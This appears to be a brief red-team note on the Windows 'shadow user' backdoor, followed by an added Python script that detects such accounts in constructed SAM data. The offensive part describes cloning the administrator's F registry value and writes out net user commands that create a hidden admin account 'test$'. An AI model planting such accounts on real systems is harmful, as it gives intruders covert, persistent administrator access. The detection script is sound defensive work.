0x00 Premise
A quick note for intranet work, mainly for one situation: you have captured a hash that cannot be cracked, do not want to use pass-the-hash, and just want to log on to the desktop directly.
0x01 Permission Maintenance - Shadow User Backdoor
Shadow accounts, ancient but effective!
Principle
A user name ending in the $ symbol is not displayed by net user. Export the registry, modify the F value to clone the account, and then delete the account.
Effect
net user
The account cannot be deleted normally; the relevant registry key values must be deleted. The Windows login screen does not display this user.
0x02 Simple and practical
ShadowUser.exe admin administrator
You can log in normally, and the desktop is that of the cloned administrator.
Simply create a hidden user
First, create a hidden user with the net commands and add it to the local Administrators group.
net user test$ Test123456 /add
net localgroup administrators test$ /add
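As an added defensive check (not part of the original post or of any tool it mentions), the script below flags exactly the two artefacts this technique leaves behind: a name ending in $ and a Users subkey whose F value carries a RID that does not match the key. It assumes the documented F-value layout (RID as a little-endian DWORD at offset 0x30, ACB flags at 0x38); the SAM entries are constructed sample data, not a real export.

```python
import struct

def make_f(rid: int, acb_flags: int = 0x0214) -> bytes:
    """Build a minimal 0x50-byte F value with only the fields this check
    reads: RID at offset 0x30 and ACB flags at 0x38 (constructed data)."""
    f = bytearray(0x50)
    struct.pack_into("<I", f, 0x30, rid)
    struct.pack_into("<H", f, 0x38, acb_flags)
    return bytes(f)

# Constructed stand-in for SAM\SAM\Domains\Account\Users: key name (RID in hex)
# -> (account name from the Names subkey, F value bytes).
SAMPLE_USERS = {
    "000001F4": ("Administrator", make_f(0x1F4)),
    "000001F5": ("Guest", make_f(0x1F5, 0x0215)),
    "000003E9": ("alice", make_f(0x3E9)),
    "000003EA": ("test$", make_f(0x1F4)),  # F value copied from RID 500
}

# Constructed stand-in for the account list "net user" printed on the host.
NET_USER_NAMES = {"Administrator", "Guest", "alice"}

def f_rid(f: bytes) -> int:
    """RID embedded in an F value (little-endian DWORD at 0x30)."""
    return struct.unpack_from("<I", f, 0x30)[0]

def find_shadow_accounts(users, visible_names):
    """Return (name, key_rid, reasons) for every SAM entry that looks like a
    hidden or cloned account; an entry with no findings is not returned."""
    findings = []
    for key, (name, f) in users.items():
        key_rid = int(key, 16)
        embedded = f_rid(f)
        reasons = []
        if name.endswith("$"):
            reasons.append("name ends with '$' (hidden from net user)")
        if name not in visible_names:
            reasons.append("present in SAM but absent from net user output")
        if embedded != key_rid:
            reasons.append(f"F value carries RID {embedded}, key is RID {key_rid} (cloned F)")
        if reasons:
            findings.append((name, key_rid, reasons))
    return findings

if __name__ == "__main__":
    for name, rid, reasons in find_shadow_accounts(SAMPLE_USERS, NET_USER_NAMES):
        print(f"{name} (RID {rid}): " + "; ".join(reasons))
```

On a live host the same comparison is made between the Users subkeys read from a SAM export and the output of net user, so an account that was hidden or cloned this way shows up even after it was "deleted".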